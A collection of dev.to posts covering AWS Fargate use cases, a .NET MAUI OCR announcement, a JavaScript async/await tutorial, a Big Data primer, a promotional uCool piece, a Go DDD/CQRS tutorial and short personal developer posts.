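To make the "task definition" concept concrete, here is a minimal, illustrative Fargate task definition; the family name, image, role ARN, and sizes are made-up example values, not a recommendation:

```json
{
  "family": "sample-web-app",
  "requiresCompatibilities": ["FARGATE"],
  "networkMode": "awsvpc",
  "cpu": "256",
  "memory": "512",
  "executionRoleArn": "arn:aws:iam::123456789012:role/ecsTaskExecutionRole",
  "containerDefinitions": [
    {
      "name": "web",
      "image": "nginx:latest",
      "portMappings": [{ "containerPort": 80, "protocol": "tcp" }],
      "essential": true
    }
  ]
}
```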
### Use Cases for AWS Fargate
Here are five prominent use cases where AWS Fargate excels:
#### 1. Microservices Architecture
Microservices architecture, which involves breaking down applications into small, independent services, aligns perfectly with Fargate's serverless nature. Each microservice can be deployed as a separate Fargate task, enabling independent scaling and fault isolation.
**Technical Implementation:**
- Define individual task definitions for each microservice, specifying the required resources and dependencies.
- Utilize AWS App Mesh or other service mesh solutions to manage communication and discovery between microservices.
- Implement auto-scaling policies based on metrics like request rate or resource utilization to ensure optimal performance and cost-efficiency.
#### 2. Batch Processing
For batch processing workloads that involve running tasks for a finite duration, Fargate provides a cost-effective solution. You can trigger Fargate tasks in response to events like file uploads or schedule them to run at specific intervals.
**Technical Implementation:**
- Create a task definition for your batch processing job, ensuring it includes all necessary libraries and dependencies.
- Use AWS Batch, a fully managed batch processing service, to submit and manage your Fargate tasks at scale.
- Leverage AWS Step Functions to orchestrate complex batch workflows involving multiple tasks and dependencies.
#### 3. Machine Learning Inference
Deploying machine learning models for inference often requires specialized hardware and scaling capabilities. Fargate allows you to serve predictions from your trained models without managing the underlying infrastructure.
**Technical Implementation:**
- Package your trained machine learning model and dependencies as a Docker image.
- Define a task definition specifying the appropriate resources (CPU, memory, GPU) for your inference workload.
- Use AWS Lambda to trigger Fargate tasks for real-time inference requests or configure a load balancer for continuous availability.
#### 4. Web Applications
Fargate can also power web applications, especially those built with microservices or serverless architectures. By containerizing your web application components and deploying them on Fargate, you benefit from auto-scaling, high availability, and simplified deployment processes.
**Technical Implementation:**
- Containerize your web application components, including the web server, application logic, and database connections.
- Utilize AWS Elastic Load Balancing (ELB) to distribute incoming traffic across multiple Fargate tasks for high availability.
- Employ Amazon RDS or other managed database services for persistent data storage and retrieval.
#### 5. Scheduled Tasks
For tasks that need to run on a recurring schedule, such as nightly backups or data processing jobs, Fargate offers a reliable and serverless solution.
**Technical Implementation:**
- Define a task definition for your scheduled task, including the necessary scripts and configurations.
- Utilize Amazon CloudWatch Events to trigger your Fargate tasks based on cron expressions or other event patterns.
- Monitor task execution logs and metrics in Amazon CloudWatch to ensure successful completion and identify any potential issues.
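As a small illustration of the trigger step, a CloudWatch Events (now EventBridge) schedule expression for a job that runs every night at 2:00 AM UTC looks like this; note that AWS's six-field cron format requires `?` in either the day-of-month or day-of-week position:

```
cron(0 2 * * ? *)
```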
### Comparing Fargate with Other Solutions
| Feature | AWS Fargate | Azure Container Instances | Google Cloud Run |
|---|---|---|---|
| Serverless | Yes | Yes | Yes |
| Cluster Management | Managed | Managed | Managed |
| Scaling | Auto-scaling based on tasks | Auto-scaling based on containers | Auto-scaling based on requests |
| Networking | VPC integration, multiple networking modes | Virtual Network integration | VPC integration |
| Pricing | Per-second billing based on resource utilization | Per-second billing based on resource utilization | Per-request billing |
### Conclusion
AWS Fargate offers a compelling solution for organizations seeking a serverless and scalable approach to running containers. By eliminating the operational overhead of cluster management, Fargate empowers developers to focus on building and deploying applications with speed and agility. Whether you're modernizing legacy applications or building cloud-native solutions, Fargate's flexibility and integration with other AWS services make it a powerful tool in your container orchestration arsenal.
## Advanced Use Case: Building a Real-Time Data Processing Pipeline with AWS Fargate and AWS Kinesis
As a software architect and AWS solution architect, imagine a scenario where your organization needs to build a real-time data processing pipeline to ingest, analyze, and visualize large volumes of streaming data from various sources, such as social media feeds, sensor data, or financial transactions.
### Architecture Overview
This advanced use case leverages AWS Fargate in conjunction with other AWS services to create a robust and scalable data processing pipeline:
1. **Data Ingestion:** Amazon Kinesis Data Streams acts as the ingestion point, capturing high-velocity data streams from various sources.
2. **Data Processing:** Fargate tasks running Apache Flink or Apache Spark Streaming process the ingested data in real time. Each Fargate task can be dedicated to a specific processing stage (e.g., filtering, transformation, aggregation).
3. **Data Storage:** Processed data is persisted in Amazon S3 for long-term storage and further analysis.
4. **Data Visualization:** Amazon QuickSight or other visualization tools connect to the processed data in S3 to provide real-time dashboards and insights.
### Benefits
- **Scalability and Elasticity:** Kinesis Data Streams and Fargate scale automatically to handle fluctuating data volumes, ensuring consistent performance.
- **Real-time Processing:** Apache Flink and Spark Streaming on Fargate enable real-time data analysis, facilitating timely decision-making.
- **Serverless Simplicity:** By utilizing Fargate, you eliminate the need to manage the underlying infrastructure, reducing operational overhead.
- **Cost-Effectiveness:** You pay only for the resources you consume, optimizing costs for both processing and storage.
### Implementation Details
- **Kinesis Data Streams:** Configure shards based on expected data volume and choose the appropriate data retention period.
- **Fargate Tasks:** Create task definitions for your data processing applications (Flink or Spark Streaming), specifying the required resources and dependencies.
- **Task Scaling:** Implement auto-scaling policies for your Fargate tasks based on Kinesis Data Streams metrics (e.g., incoming records per second).
- **Data Persistence:** Configure your data processing applications to store processed data in Amazon S3 using the appropriate format (e.g., Parquet, Avro).
This advanced use case showcases the power and flexibility of AWS Fargate when combined with other AWS services. By leveraging the serverless nature of Fargate and the scalability of Kinesis Data Streams, you can build robust and cost-effective data processing pipelines to handle the most demanding real-time data challenges.
| virajlakshitha | |
1,879,816 | OCR in .NET MAUI | Did you know that now you can scan text from an image with .NET MAUI? 🚀 We've just added OCR (Optical... | 0 | 2024-06-07T03:05:16 | https://dev.to/strypperjason/ocr-in-net-maui-2dcp | maui, dotnet | Did you know that you can now scan text from an image with .NET MAUI? 🚀 We've just added OCR (Optical Character Recognition) to our toolkit! Enhance your apps with seamless text extraction from images. Download or clone MAUIsland to explore how it works.
1. Download: https://www.microsoft.com/store/productId/9NLQ0J5P471L?ocid=pdpshare
2. Repository: https://github.com/Strypper/mauisland
📱💻 #dotNET #MAUI #OCR #TechUpdates #DevCommunity

| strypperjason |
1,879,025 | Explaining Async/Await in JavaScript in 10 Minutes | For a long time, we've relied on callbacks to deal with asynchronous code in JavaScript. As a... | 27,954 | 2024-06-07T03:00:00 | https://howtodevez.blogspot.com/2024/03/explaining-asyncawait-in-javascript-in.html | javascript, typescript, webdev, beginners | * For a long time, we've relied on callbacks to deal with asynchronous code in JavaScript. As a result, many of us have faced dreadful experiences dealing with deeply nested functions (**callback hell**).

* Callbacks come with a lot of drawbacks. When we have multiple asynchronous operations, callbacks have to wait for each other to execute, prolonging the completion time. Additionally, writing nested callbacks makes our code messy and hard to maintain.
* In the **ES6 (ECMAScript 2015)** version, JavaScript introduced Promises. This was a fantastic replacement for callbacks and was quickly embraced by the community. Our new code looks similar to the old one, making it easier to follow and maintain. However, the issues with callbacks weren't completely resolved.
* Since the **ES7 (ECMAScript 2016)** version, **Async/Await** has been added to make asynchronous code in JavaScript look and feel easier to use.
What is Async/Await?
--------------------
Async/Await is a feature of JavaScript that lets us write asynchronous code in a synchronous-looking style. It's built on top of Promises and is fully compatible with them. Here's how it works:
### Async - used when declaring an asynchronous function.
```ts
async function asyncFunction() {
// block code
// could be return anything (or not)
}
```
In an async function, when you return any value, it will always be a Promise.
**For example:**
* Returning a number will result in **_Promise<number>_**.
* If nothing is returned, the result will be **_Promise<void>_**.
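For example, this small sketch shows the automatic wrapping:

```ts
async function giveNumber() {
  return 42; // callers actually receive Promise<number>
}

giveNumber().then(value => console.log(value)); // logs 42
```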
### Await - pauses the execution of async functions.
```ts
const result = await asyncFunction() // must settle before the next line runs
// do anything else
```
* When placed before a Promise, it waits until the Promise is executed and returns the result before continuing to execute the next line of code.
* Await only works with Promises; it doesn't work with callbacks.
* Await can only be used inside async functions.
### **Example Usage**
Here, I'll provide a simple example, often used, of writing a function to make an HTTP GET call and receive JSON data. I'll implement it in two ways for you to compare between using Promise and Async/Await.
```ts
// Promise approach
function getData() {
return new Promise((resolve) => {
fetch('api endpoint').then(response => resolve(response.json()));
});
}
// Async/Await approach
async function getData() {
const response = await fetch('api endpoint');
return response.json();
}
// then use function like
const data = await getData();
console.log(data);
```
Both functions above perform the same function - they both return a Promise containing JSON data. However, you can see that when using Async/Await, the code is more concise and easier to read.
Comparing Async/Await and Promise:
----------------------------------
* In essence, when using Async/Await, we are actually interacting with Promises.
* However, Promises provide some built-in functions that allow us to manipulate multiple Promises simultaneously more easily, such as Promise.all, Promise.race, etc.
* Using Async/Await is suitable when you want to implement asynchronous code in a synchronous-looking manner for readability and understanding, especially when operations must run sequentially.
**For example:**
```ts
async function sum() {
// sequentially
let value1 = await getValue1();
let value2 = await getValue2();
let value3 = await getValue3();
return value1 + value2 + value3;
}
async function sum() {
// send all requests at the same time.
  const results = await Promise.all([getValue1(), getValue2(), getValue3()]); // results is an array of resolved values
return results.reduce((total, value) => total + value);
}
```
Error Handling
--------------
Async/Await allows us to catch unexpected errors simply by using **_try/catch/finally_** as usual. Both synchronous and asynchronous errors can be caught:
```ts
async function asyncFunction() {
try {
const result = await asyncHandle();
// handle result
} catch(error) {
console.error(error)
} finally {
// optional, always execute here
}
}
```
Another way is to use the **_catch()_** function (a built-in function of **Promise**), because async functions all return Promises, so error catching would look like this:
```ts
async function asyncFunction() {
const result = await asyncHandle();
return result;
}
asyncFunction()
.then(successHandler)
.catch(errorHandler)
.finally(finallyHandler);
```
Conclusion
----------
* Using **Async/Await** helps us implement asynchronous code in a synchronous manner, making the syntax easier to read and understand, leading to easier maintenance.
* Currently, **Async/Await** is supported on most modern browsers (except **IE11**), it's supported in **NodeJS** environment, and it's even available in **TypeScript**. So, whether you're developing on any **JavaScript** environment, you can make use of it.
**_Feel free to like and share the content if you find it helpful, and don't hesitate to leave a comment to give feedback or if you have any questions you'd like to discuss._**
**_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/03/explaining-asyncawait-in-javascript-in.html) to support the author and explore more interesting content._**🙏
<a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a> | chauhoangminhnguyen |
1,879,814 | I want to get back into desktop programming - help me choose | Hi all! Every so often, I find myself missing the fun of building user interfaces and running... | 0 | 2024-06-07T02:50:11 | https://dev.to/rolandixor/i-want-to-get-back-into-desktop-programming-help-me-choose-4169 | desktop, linux, programming | Hi all!
Every so often, I find myself missing the fun of building user interfaces and running applications that I put together myself, even if just for the sake of it. It's been so long that the last time I built anything meaningful on the desktop, I was running Windows XP! Since then, I've been focused on the web (front end and backend; but frontend primarily) for the most part, with some CLI programming thrown in here and there.
**_But now_**, I'd like to get back into the groove of it, as a hobby, really, but I'm undecided on what language I should pick up, and where I should put my efforts.
So I'm throwing it out to you...
## What's your favourite language + toolkit, and why?
If you're into desktop programming on Linux, what's your language + toolkit, and what makes it special for you? In the past, I've played around with interpreted languages for desktop programming, but I've always loved the speed and frankly, the "elite feeling" of compiled languages, such as C and C++.
However, I feel like we've come a long way since the days when these were our primary options (outside of Pascal and the like). So if you were getting started today, what would you choose? Rust? Vala? Something interpreted?
Feel free to share resources in the comments, too - I'd especially love to get into a language with a "noob-friendly" approach to getting started. I find that no matter how far I get in my understanding, the simpler, the better. | rolandixor |
1,879,770 | The Future of AI: Exploring AGI and ASI | Artificial Intelligence (AI) is transforming our world, with advancements like virtual assistants and... | 27,626 | 2024-06-07T01:34:00 | https://dev.to/nandha_krishnan_nk/the-future-of-ai-exploring-agi-and-asi-5aep | ai, machinelearning, deeplearning | **Artificial Intelligence** (AI) is transforming our world, with advancements like virtual assistants and autonomous vehicles becoming everyday realities. However, two emerging concepts promise to revolutionize AI further:** Artificial General Intelligence (AGI) and Artificial Superintelligence (ASI).**
**What is AGI?**
Artificial General Intelligence (AGI) is AI that can understand, learn, and apply knowledge across various tasks at a human-like level. Unlike narrow AI, which excels in specific areas (like playing chess), AGI can think, reason, and adapt to new situations.
**Key Features of AGI:**
**Versatility:** Can perform any intellectual task a human can.
**Learning:** Continuously improves from experiences.
**Autonomy:** Operates independently without human intervention.
**AGI** has the potential to revolutionize healthcare, education, and scientific research, but ensuring its safety and reliability is crucial.
**What is ASI?**
Artificial Superintelligence (ASI) surpasses human intelligence in all aspects. ASI can innovate and create beyond current human capabilities.
**Key Features of ASI:**
**Superior Intelligence:** Outperforms human minds in every field.
**Self-Improving:** Enhances its own algorithms rapidly.
**Autonomy:** Makes complex decisions independently.
**ASI** could solve global challenges and drive technological breakthroughs, but it also poses significant risks if not properly controlled. Ensuring ASI aligns with human values and ethical principles is vital.
**Conclusion:**
**AGI and ASI** represent the future of AI, offering transformative potential while posing new challenges. As we advance toward these milestones, responsible and ethical development is essential to harness their benefits and mitigate risks. The journey towards AGI and ASI will be one of the most significant endeavors of our time, shaping the future of humanity.
| nandha_krishnan_nk |
1,879,813 | Detecting Deception—The Importance of Fake ID Document Detection (ID document liveness detection) | In the current digital era, fake ID document detection is essential; confirming identities is now a... | 0 | 2024-06-07T02:43:09 | https://dev.to/faceplugin/detecting-deception-the-importance-of-fake-id-document-detection-id-document-liveness-detection-3h9d | In the current digital era, fake ID document detection is essential; confirming identities is now a vital step in preventing fraud and guaranteeing security. ID document authentication is one of the most important components of identity verification.
The prevalence of false identification documents and identity theft highlights the need for a strong mechanism to identify and stop these dangers. Fake identification and identity theft pose a severe risk to national security as well as monetary losses and reputational harm.
Fraudsters use advanced technology to produce convincing fake IDs that are difficult to tell apart from genuine documents. This is where ID document liveness detection comes in.
Businesses and organizations can feel secure knowing that they are shielded from identity thieves and fraudulent IDs thanks to FacePlugin’s ID document liveness detection. Their product is a vital weapon in the battle against identity fraud because of its user-friendly, effective, and extremely precise design.
In this piece, we will take a closer look at the ID document liveness detection field and examine the advantages, workings, and use cases of FacePlugin’s approach. We will also go over the significance of verifying ID documents and the dangers of identity theft and phony IDs. By the time you finish reading this post, you will know why ID document liveness detection matters and how FacePlugin’s solution can help you keep scammers at bay.
Read full article here.
https://faceplugin.com/importance-of-fake-id-document-detection-id-document-liveness-detection/ | faceplugin | |
1,879,812 | The Basics of Big Data: What You Need to Know | Big Data has become a buzzword in the tech industry, revolutionizing how businesses operate and make... | 0 | 2024-06-07T02:37:19 | https://dev.to/bvanderbilt0033/the-basics-of-big-data-what-you-need-to-know-260e | dataprotection, dataanalytics, dataprivacy, bigdata | Big Data has become a buzzword in the tech industry, revolutionizing how businesses operate and make decisions. But what exactly is Big Data, and why is it so important? This article will break down the [basics of Big Data](https://www.rontar.com/glossary/big-data/), its significance, and how it impacts various sectors.
## What is Big Data?
Big Data refers to the massive volume of data generated every second from various sources such as social media, sensors, transactions, and more. This data is characterized by the three Vs:
**Volume:** The sheer amount of data generated is enormous, reaching petabytes and exabytes.
**Velocity:** The speed at which data is generated and processed is incredibly fast.
**Variety:** The data comes in various forms, including structured (databases), semi-structured (XML), and unstructured (text, images, videos).
## Why is Big Data Important?
**Improved Decision Making:** Big Data analytics helps businesses make informed decisions by uncovering patterns, trends, and insights from vast datasets.
**Enhanced Customer Experience:** By analyzing customer data, companies can tailor their products and services to meet customer needs, leading to higher satisfaction and loyalty.
**Operational Efficiency:** Big Data can identify inefficiencies in operations, allowing organizations to optimize processes and reduce costs.
**Innovation and New Products:** Insights from Big Data can drive innovation, leading to the development of new products and services that meet emerging market demands.
## Key Components of Big Data
**Data Sources:** Big Data comes from various sources, including social media, IoT devices, transactional systems, and more.
**Data Storage:** With the massive volume of data, traditional storage methods are inadequate. Technologies like Hadoop, NoSQL databases, and cloud storage solutions are commonly used.
**Data Processing:** Processing Big Data requires advanced technologies such as MapReduce, Apache Spark, and real-time data processing frameworks.
**Data Analysis:** Tools like machine learning, data mining, and predictive analytics are employed to extract valuable insights from Big Data.
**Data Visualization:** To make sense of complex data, visualization tools like Tableau, Power BI, and D3.js are used to create interactive and easy-to-understand visual representations.
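As a concrete illustration of the MapReduce model mentioned above, here is a minimal, hypothetical Python sketch of the classic word-count job, where the map step emits `(word, 1)` pairs and the reduce step sums the counts per key (the function names are illustrative and not tied to any specific framework):

```python
from itertools import groupby
from operator import itemgetter

def map_phase(lines):
    # Emit a (word, 1) pair for every word in every input line.
    for line in lines:
        for word in line.lower().split():
            yield (word, 1)

def reduce_phase(pairs):
    # Group pairs by word (sorting stands in for the shuffle step),
    # then sum the counts for each word.
    counts = {}
    for word, group in groupby(sorted(pairs), key=itemgetter(0)):
        counts[word] = sum(c for _, c in group)
    return counts

lines = ["big data is big", "data drives decisions"]
print(reduce_phase(map_phase(lines)))
# → {'big': 2, 'data': 2, 'decisions': 1, 'drives': 1, 'is': 1}
```

Real frameworks such as Hadoop or Spark distribute the map and reduce phases across many machines; the shape of the computation, however, is the same.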
## Big Data in Action
**Healthcare:** Big Data is used to analyze patient data for better diagnosis, treatment plans, and predicting disease outbreaks.
**Finance:** Financial institutions use Big Data for fraud detection, risk management, and personalized financial services.
**Retail:** Retailers analyze customer data to optimize inventory, enhance customer experience, and drive sales through targeted marketing.
**Transportation:** Big Data helps optimize routes, reduce fuel consumption, and improve overall efficiency in logistics and transportation.
**Government:** Governments use Big Data for policy-making, improving public services, and enhancing security measures.
## Challenges of Big Data
**Data Privacy and Security:** With the vast amount of data collected, ensuring privacy and security is a major concern.
**Data Quality:** Ensuring the accuracy and consistency of data is crucial for reliable analysis.
**Scalability:** Handling the ever-growing volume of data requires scalable infrastructure and solutions.
**Skilled Workforce:** There is a high demand for skilled professionals who can manage and analyze Big Data effectively.
## The Future of Big Data
The future of Big Data is promising, with advancements in artificial intelligence, machine learning, and quantum computing poised to further revolutionize the field. As technology continues to evolve, the potential applications and benefits of Big Data will expand, driving innovation and growth across industries.
## Conclusion
Big Data is more than just a trend; it's a critical component of modern business strategy and operations. Understanding the basics of Big Data, its importance, and how it's used can help individuals and organizations leverage its power to make better decisions, improve efficiency, and drive innovation. Whether you're a business leader, a data enthusiast, or someone curious about the tech world, grasping the fundamentals of Big Data is essential in today's data-driven landscape. | bvanderbilt0033 |
1,879,810 | uCool Lu Lu: Bold Decision to invest in high-impact marketing | The MVP approach enables indie game developers with limited resources to validate their game concept,... | 0 | 2024-06-07T02:31:14 | https://dev.to/ucool-lulu/ucool-lu-lu-bold-decision-to-invest-in-high-impact-marketing-3k3 | The MVP approach enables indie game developers with limited resources to validate their game concept, gather user feedback, and iteratively improve their product while minimizing risks and development costs. uCool is a prime example of how this strategy can lead to the successful development and launch of engaging games that resonate with players.

## Lu Lu's bold decision to invest in high-impact marketing
Similarly, uCool, under the leadership of Lu Lu, has demonstrated the effectiveness of the MVP approach. Known for the successful mobile game Heroes Charge, uCool has managed to attract millions of players by focusing on strategic gameplay and community building. Lu Lu's bold decision to invest in high-impact marketing, such as the 2015 Super Bowl ad for Heroes Charge, showcases a commitment to bold, innovative strategies that have paid off in player engagement and retention.
## Innovative Gameplay and Community Engagement
uCool's Heroes Charge, on the other hand, features over 50 heroes and offers players the chance to engage in strategic combat and team-building activities. By focusing on balance and transparency, uCool ensures a fair and satisfying player experience, fostering a loyal and active community.
## The Role of Leadership in Game Development
Lu Lu's leadership at uCool has been characterized by a commitment to quality and a proactive approach to game development and marketing, ensuring that their games remain competitive and appealing.
By focusing on core features, testing in specific markets, and continuously iterating based on player feedback, these companies have been able to create popular games that not only entertain but also build strong, lasting communities. As the gaming industry continues to evolve, the MVP approach will remain a valuable strategy for developers seeking to innovate responsibly and bring their game ideas to life. | xx-somuch | |
1,879,809 | Applying Domain-Driven Design and the CQRS Pattern in Golang for Beginners | What Is DDD (Domain-Driven Design) Architecture? Hey friends! So, Domain-Driven... | 0 | 2024-06-07T02:27:03 | https://dev.to/yogameleniawan/penerapan-domain-driven-design-dan-cqrs-pattern-di-golang-untuk-pemula-4bdl | go |

### What Is DDD (Domain-Driven Design) Architecture?
Hey friends! Domain-Driven Design (DDD) is an approach to software development whose main focus is the business domain the application deals with. In DDD, we pay more attention to business logic and to modeling that domain in a way that is easy for both the development team and business stakeholders to understand.
**Why Use DDD?**
1. Focus on the Domain: DDD helps us focus on the business domain and the logic related to it. This means we model the code based on how the business actually works.
2. Better Communication: DDD uses the same language as the business domain (_Ubiquitous Language_), so communication between the technical team and business stakeholders becomes more effective.
3. Clear Code Structure: With DDD, our code is structured by domain and subdomain. This makes the code easier to understand and maintain.
4. Scalability: DDD supports modularity and scalability. As the business grows, the application can grow too without major rework.
### What Is the CQRS (Command Query Responsibility Segregation) Pattern?
CQRS is a design pattern that separates read operations (queries) from write operations (commands) in an application. So, instead of combining reads and writes in a single model, we split them into two different models. This allows us to optimize and scale each kind of operation independently.
**Why Use the CQRS Pattern?**
1. Performance Optimization: By separating _read_ and _write_ operations, we can optimize each one as needed. For example, we can use caching for _read_ operations without affecting _write_ operations.
2. Scalability: CQRS allows the parts of the application that handle queries and commands to be scaled independently. This is very useful once the application grows large and the workload increases.
3. Simpler Data Models: Separating the data models for _read_ and _write_ can simplify database design. The query model can be optimized for _read_ performance, while the command model can be optimized for writes and transactions.
4. Isolation of Business Logic: CQRS helps separate business logic from presentation and data logic, making the code cleaner and easier to maintain.
For the full article, you can read my post about [CQRS here](https://yogameleniawan.com/learning-media/memahami-cqrs-command-query-responsibility-segregation-kenapa-dan-bagaimana-menggunakannya-4hmf)
### Example Implementation of DDD and CQRS in Golang
**Folder and File Structure**
```bash
/project
/cmd
/app
main.go
/internal
/domain
/product
product.go
/infrastructure
/db
db.go
/http
http.go
/application
/product
/commands
create_product.go
/queries
get_product.go
/interfaces
/http
product_handler.go
```
**Entity (Product)**
```go
// internal/domain/product/product.go
package product
type Product struct {
ID string
Name string
Price float64
}
```
**Infrastructure (Database)**
```go
// internal/infrastructure/db/db.go
package db
import (
"database/sql"
"fmt"
_ "github.com/mattn/go-sqlite3"
)
func NewSQLiteDB(dataSourceName string) (*sql.DB, error) {
db, err := sql.Open("sqlite3", dataSourceName)
if err != nil {
return nil, err
}
if err := db.Ping(); err != nil {
return nil, err
}
fmt.Println("Connected to the database successfully!")
return db, nil
}
```
**Commands (CreateProduct)**
```go
// internal/application/product/commands/create_product.go
package commands
import (
	"context"
	"crypto/rand"
	"encoding/hex"

	"github.com/yogameleniawan/ddd_project/internal/domain/product"
)

type CreateProductCommand struct {
	Name  string
	Price float64
}

type CreateProductHandler struct {
	repo product.Repository
}

func NewCreateProductHandler(repo product.Repository) *CreateProductHandler {
	return &CreateProductHandler{repo}
}

func (h *CreateProductHandler) Handle(ctx context.Context, cmd CreateProductCommand) (product.Product, error) {
	p := product.Product{
		ID:    generateID(), // a UUID library could be used instead
		Name:  cmd.Name,
		Price: cmd.Price,
	}
	err := h.repo.Save(p)
	if err != nil {
		return product.Product{}, err
	}
	return p, nil
}

// generateID returns a random 16-byte hex string as a simple ID.
func generateID() string {
	b := make([]byte, 16)
	rand.Read(b)
	return hex.EncodeToString(b)
}
```
**Queries (GetProduct)**
```go
// internal/application/product/queries/get_product.go
package queries
import (
"context"
"github.com/yogameleniawan/ddd_project/internal/domain/product"
)
type GetProductQuery struct {
ID string
}
type GetProductHandler struct {
repo product.Repository
}
func NewGetProductHandler(repo product.Repository) *GetProductHandler {
return &GetProductHandler{repo}
}
func (h *GetProductHandler) Handle(ctx context.Context, query GetProductQuery) (product.Product, error) {
return h.repo.FindByID(query.ID)
}
```
**Repository (Data Access)**
```go
// internal/domain/product/repository.go
package product

import "database/sql"
type Repository interface {
Save(product Product) error
FindByID(id string) (Product, error)
}
type sqliteRepository struct {
db *sql.DB
}
func NewSQLiteRepository(db *sql.DB) Repository {
return &sqliteRepository{db}
}
func (r *sqliteRepository) Save(product Product) error {
_, err := r.db.Exec("INSERT INTO products (id, name, price) VALUES (?, ?, ?)", product.ID, product.Name, product.Price)
return err
}
func (r *sqliteRepository) FindByID(id string) (Product, error) {
row := r.db.QueryRow("SELECT id, name, price FROM products WHERE id = ?", id)
var product Product
err := row.Scan(&product.ID, &product.Name, &product.Price)
if err != nil {
return Product{}, err
}
return product, nil
}
```
**Interface (HTTP Handler)**
```go
// internal/interfaces/http/product_handler.go
package http
import (
"encoding/json"
"net/http"
"github.com/yogameleniawan/ddd_project/internal/application/product/commands"
"github.com/yogameleniawan/ddd_project/internal/application/product/queries"
)
type ProductHandler struct {
createHandler *commands.CreateProductHandler
getHandler *queries.GetProductHandler
}
func NewProductHandler(createHandler *commands.CreateProductHandler, getHandler *queries.GetProductHandler) *ProductHandler {
return &ProductHandler{createHandler, getHandler}
}
func (h *ProductHandler) CreateProduct(w http.ResponseWriter, r *http.Request) {
var req struct {
Name string `json:"name"`
Price float64 `json:"price"`
}
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
cmd := commands.CreateProductCommand{
Name: req.Name,
Price: req.Price,
}
product, err := h.createHandler.Handle(r.Context(), cmd)
	if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(product)
}
func (h *ProductHandler) GetProduct(w http.ResponseWriter, r *http.Request) {
id := r.URL.Query().Get("id")
query := queries.GetProductQuery{
ID: id,
}
product, err := h.getHandler.Handle(r.Context(), query)
	if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(product)
}
```
**Entry Point (main.go)**
```go
// cmd/app/main.go
package main

import (
	"log"
	"net/http"

	"github.com/yogameleniawan/ddd_project/internal/application/product/commands"
	"github.com/yogameleniawan/ddd_project/internal/application/product/queries"
	"github.com/yogameleniawan/ddd_project/internal/domain/product"
	"github.com/yogameleniawan/ddd_project/internal/infrastructure/db"
	ihttp "github.com/yogameleniawan/ddd_project/internal/interfaces/http" // aliased to avoid clashing with net/http
)

func main() {
	dbConn, err := db.NewSQLiteDB("file:products.db?cache=shared&mode=memory")
	if err != nil {
		log.Fatalf("could not connect to the database: %v", err)
	}

	productRepo := product.NewSQLiteRepository(dbConn)

	createProductHandler := commands.NewCreateProductHandler(productRepo)
	getProductHandler := queries.NewGetProductHandler(productRepo)

	productHandler := ihttp.NewProductHandler(createProductHandler, getProductHandler)

	http.HandleFunc("/products", productHandler.CreateProduct)
	http.HandleFunc("/product", productHandler.GetProduct)

	log.Fatal(http.ListenAndServe(":8080", nil))
}
```
**Explanation**
- **Entity**: Defines `Product` with the attributes `ID`, `Name`, and `Price`.
- **Infrastructure**: Example connection to a SQLite database.
- **Commands**: `CreateProductCommand` and `CreateProductHandler` handle the write operations.
- **Queries**: `GetProductQuery` and `GetProductHandler` handle the _read_ operations.
- **Repository**: Repository implementation for data access.
- **HTTP Handler**: Handlers for the HTTP requests that cover the _read_ and _write_ operations.
- **Main**: The application entry point, wiring all the components together and running the HTTP server.
With CQRS, we can separate the read and write logic so the application performs better and the code is more structured. Hope this explanation helps! Happy coding! And remember: code gets typed, not just pondered. See you in the next article!
| yogameleniawan |
1,879,777 | iptables not found error when running dockerd & | On Rocky Linux 8.10, dockerd & ... | 0 | 2024-06-07T02:01:22 | https://dev.to/__aa3e4bc832ba7032bfa3/dockerd-silhaeng-si-iptables-not-found-oryu-2ja8 | docker, iptables | On Rocky Linux 8.10, if running
```shell
dockerd &
```
produces an error like
```
failed to start daemon: Error initializing network controller: error obtaining controller instance: failed to register "bridge" driver: failed to create NAT chain DOCKER: iptables not found
```
then you can run it as
```shell
dockerd --iptables=false &
```
instead, and it will start.
**However, this can cause problems later, so it is better to install the iptables-related packages with dnf.** | __aa3e4bc832ba7032bfa3
1,879,805 | Approving My New Developer Portfolio | Lately, I've been immersed in crafting my new portfolio, aiming for a perfect blend of sophistication... | 0 | 2024-06-07T02:25:08 | https://dev.to/kiraaziz/approving-my-new-developer-portfolio-1p4g | webdev, javascript, beginners, programming | Lately, I've been immersed in crafting my new portfolio, aiming for a perfect blend of sophistication and creativity.
Inspired by classical art and infused with captivating animations, it's been a labor of love to refine it to its current state.
You can check it out here: [https://coolkira.vercel.app](https://coolkira.vercel.app). I'd love to hear your thoughts! | kiraaziz
1,879,808 | Under the Hood: How a Revolutionary Platform Propelled the 2024 NFL Draft to Stratospheric Heights | Alright, tech fiends, strap in because we're about to embark on one wild ride! As someone who's... | 0 | 2024-06-07T02:24:26 | https://dev.to/kevintse756/under-the-hood-how-a-revolutionary-platform-propelled-the-2024-nfl-draft-to-stratospheric-heights-21k6 |
